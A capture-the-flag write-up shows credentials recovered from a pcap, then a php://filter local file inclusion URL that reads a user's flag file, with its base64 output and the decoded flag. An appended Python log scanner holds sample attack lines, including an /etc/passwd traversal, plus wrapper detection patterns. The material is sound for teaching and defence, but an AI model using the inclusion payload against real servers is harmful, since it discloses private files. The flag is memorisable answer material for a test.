Hotel

We're given a URL and a pcap file and told that we have captured some traffic from "Jake". The first thing to do is open the pcap in Wireshark; if the capture includes his login, it should contain the username and password. Once in Wireshark we filter by http.

Wireshark filtered by http

We're looking for POST requests, and more specifically the data they contain. There are two in the screenshot above; the first one contains the following:

First POST request data

Unfortunately when we try this it doesn't work, so we see if the second one contains anything useful:

Second POST request data

It seems Jake made a typo the first time and did not capitalise the first character of his password; this one works!

Screenshot of website after login

Once logged in it's time to look around. We were told to see if we can get to /home/jake/flag.txt. This is clearly a local file, so we need to check for local file inclusion techniques. There is a file upload within the recipes which seems promising, but this isn't the way we managed to do it; we eventually exported the local file, base64-encoded, via the following URL:

<base_URL>/<page>.php?page=php://filter/convert.base64-encode/resource=/home/jake/flag.txt

This printed out the following:

CgoKCiAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgX18KICAgICAgICAgICAgICAgICAgLyBcLS0uLl9fX18KICAgICAgICAgICAgICAgICAgIFwgXCAgICAgICBcLS0tLS0sLCwuLgogICAgICAgICAgICAgICAgICAgIFwgXCAgICAgICBcICAgICAgICAgXC0tLCwuLgogICAgICAgICAgICAgICAgICAgICBcIFwgICAgICAgXCAgICAgICAgIFwgICwnCiAgICAgICAgICAgICAgICAgICAgICBcIFwgICAgICAgXCAgICAgICAgIFwgYGAuLgogICAgICAgICAgICAgICAgICAgICAgIFwgXCAgICAgICBcICAgICAgICAgXC0nJwogICAgICAgICAgICAgICAgICAgICAgICBcIFwgICAgICAgXF9fLCwtLScnJwogICAgICAgICAgICAgICAgICAgICAgICAgXCBcICAgICAgIFwuCiAgICAgICAgICAgICAgICAgICAgICAgICAgXCBcICAgICAgLC8KICAgICAgICAgICAgICAgICAgICAgICAgICAgXCBcX18uLi0KICAgICAgICAgICAgICAgICAgICAgICAgICAgIFwgXAogICAgICAgICAgICAgICAgICAgICAgICAgICAgIFwgXCAgICAgcGFjdGZ7bTB0ZWxfS2FMaWZvcm4xYX0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgXCBcCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBcIFwKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBcIFwKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgXCBcCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBcIFwKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBcIFwKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgXCBcCgoK

Which looked like:

Screenshot of website after base64 export

When this was decoded from base64, we got the following:




                  
                   __
                  / \--..____
                   \ \       \-----,,,..
                    \ \       \         \--,,..
                     \ \       \         \  ,'
                      \ \       \         \ ``..
                       \ \       \         \-''
                        \ \       \__,,--'''
                         \ \       \.
                          \ \      ,/
                           \ \__..-
                            \ \
                             \ \     pactf{m0tel_KaLiforn1a}
                              \ \
                               \ \
                                \ \
                                 \ \
                                  \ \
                                   \ \
                                    \ \
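The php://filter trick above leaves a distinctive footprint in the web server's access log. As an added example that is not part of the original writeup, the Python below scans constructed log lines (the file names, IPs and parameter name `page` are assumptions) for PHP stream wrappers and directory traversal in query parameters, and pulls out the `resource=` path that a `php://filter` request is reading.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (combined log format); not from the original capture.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2020:10:00:01 +0000] "GET /index.php?page=recipes HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2020:10:00:07 +0000] "GET /index.php?page=php://filter/convert.base64-encode/resource=/home/jake/flag.txt HTTP/1.1" 200 2048
10.0.0.9 - - [01/Jan/2020:10:00:09 +0000] "GET /index.php?page=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1024
10.0.0.9 - - [01/Jan/2020:10:00:12 +0000] "POST /login.php HTTP/1.1" 302 0
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/')
# PHP stream wrappers that turn an include() of user input into a file read or worse.
WRAPPER_RE = re.compile(r'^(php|file|data|expect|phar|zip)://', re.IGNORECASE)

def classify_value(value):
    """Return a finding label for one decoded parameter value, or None if it looks benign."""
    value = unquote(value)  # second decode catches double-encoded payloads
    m = WRAPPER_RE.match(value)
    if m:
        label = f"wrapper:{m.group(1).lower()}"
        # php://filter/<filters>/resource=<path> discloses the raw file; record the target path.
        res = re.search(r'resource=(.+)$', value)
        if res:
            label += f" resource={res.group(1)}"
        return label
    if '../' in value or '..\\' in value:
        return "traversal"
    return None

def scan_log(text):
    """Return (client, method, param, finding) for every suspicious query parameter in the log."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        client = line.split(' ', 1)[0]
        query = urlsplit(m.group('target')).query  # parse_qs already percent-decodes once
        for param, values in parse_qs(query, keep_blank_values=True).items():
            for v in values:
                finding = classify_value(v)
                if finding:
                    findings.append((client, m.group('method'), param, finding))
    return findings

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

The fix on the server side is to stop passing the `page` value to `include` at all and map a fixed set of page names to files instead; the detector is for finding out whether anyone has already tried.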